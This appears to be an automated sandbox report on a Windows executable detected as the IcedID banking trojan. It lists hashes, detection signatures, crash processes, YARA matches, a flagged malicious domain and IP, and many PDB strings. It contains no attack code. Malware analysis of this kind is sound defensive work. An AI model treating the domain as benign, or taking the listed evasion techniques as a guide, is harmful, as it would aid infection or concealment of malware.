Play interactive tour

Edit tour

Analysis Report sample4.bin

Overview

General Information

Sample Name:	sample4.bin (renamed file extension from bin to exe)
Analysis ID:	339451
MD5:	5009b8bcf024704c8b23e42c492f118c
SHA1:	df607367a88b5610a224909efb8debeb0d90f487
SHA256:	30f099660904079afcd445409cfd2eca735fab49dda522f03ed60d47f9f21bdc
Most interesting Screenshot:

Detection

IcedID

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected IcedID

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

sample4.exe (PID: 2100 cmdline: 'C:\Users\user\Desktop\sample4.exe' MD5: 5009B8BCF024704C8B23E42C492F118C)

WerFault.exe (PID: 1488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 768 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 804 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 620 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 896 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5008 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 924 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 1224 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
Process Memory Space: sample4.exe PID: 2100	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.sample4.exe.d0000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: sample4.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Show sources

Source: gegemony4you.top

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: sample4.exe	Virustotal: Detection: 77%			Perma Link
Source: sample4.exe	ReversingLabs: Detection: 79%

Yara detected IcedID

Show sources

Source: Yara match

File source: Process Memory Space: sample4.exe PID: 2100, type: MEMORY

Yara detected IcedID

Show sources

Source: Yara match	File source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.sample4.exe.d0000.0.unpack, type: UNPACKEDPE

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\sample4.exe

Unpacked PE file: 0.2.sample4.exe.d0000.0.unpack

Source: sample4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 104.244.42.131:443 -> 192.168.2.3:49761 version: TLS 1.2

Source: sample4.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msvcrt.pdbk source: WerFault.exe, 00000011.00000003.373483424.0000000004FC2000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbT source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb6 source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb7 source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.373483424.0000000004FC2000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb) source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb? source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbf source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdbt source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb- source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb, source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdbx source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbl source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: comdlg32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb\| source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.373534997.0000000004FD3000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391511057.0000000004C84000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: webio.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: oleacc.pdb1 source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb7 source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdbH source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb# source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb~ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: msimg32.pdbT source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb1 source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb/ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb) source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb/ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb& source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb` source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: oleacc.pdb^ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb" source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: ncryptsslp.pdb= source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: c:\Schoolwheel\Commontie\hithere\anyhit\Subtractmountain\TakeLand\Whilecardstone.pdb source: sample4.exe
Source:	Binary string: nsi.pdb_ source: WerFault.exe, 00000011.00000003.373534997.0000000004FD3000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391511057.0000000004C84000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdbh source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdb; source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: oleacc.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb; source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdbJ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb# source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdbZ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb_ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb5 source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb- source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb% source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: msimg32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbF source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb, source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp
Source:	Binary string: upwntdll.pdb source: WerFault.exe, 00000011.00000003.368397809.0000000004C0E000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.385905313.0000000004A4D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.409232348.0000000002FAA000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.436877307.00000000051E4000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb# source: WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp
